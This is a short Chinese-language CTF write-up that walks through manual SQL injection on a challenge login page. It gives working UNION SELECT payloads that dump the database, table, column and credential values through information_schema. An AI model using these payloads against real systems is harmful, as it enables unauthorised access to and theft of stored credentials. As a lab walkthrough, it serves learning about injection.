访问目标地址,出现下面酷酷的页面,最上面有提示 用 sqlmap 是没有灵魂的,我用sqlmap扫了一下,果然扫不出来注入点
首先随便输入账号密码进行测试
万能语句注入测试,成功,判断为单引号字符型注入
尝试联合注入,成功,判断列数为3列
order by为4时报错,为3时页面正常
接下来测试回显点,为2,3
接下来爆破数据库名,为geek
1' union select 1,2,database()#
然后爆表名,有geekuser,l0ve1ysq1两个表 注意:数据库名字要用单引号括起来
(这里我在2那个地方注入会报错,只能在3那里注入成功,不知道什么原因)
1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='geek'#
然后爆列名,有三列:id,username,password
注意:表名字要用单引号括起来
1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1'#
查询username分别是什么,发现名为flag
1' union select 1,2,group_concat(username) from l0ve1ysq1#
找到flag对应的password,成功发现flag
1' union select 1,2,group_concat(password) from l0ve1ysq1#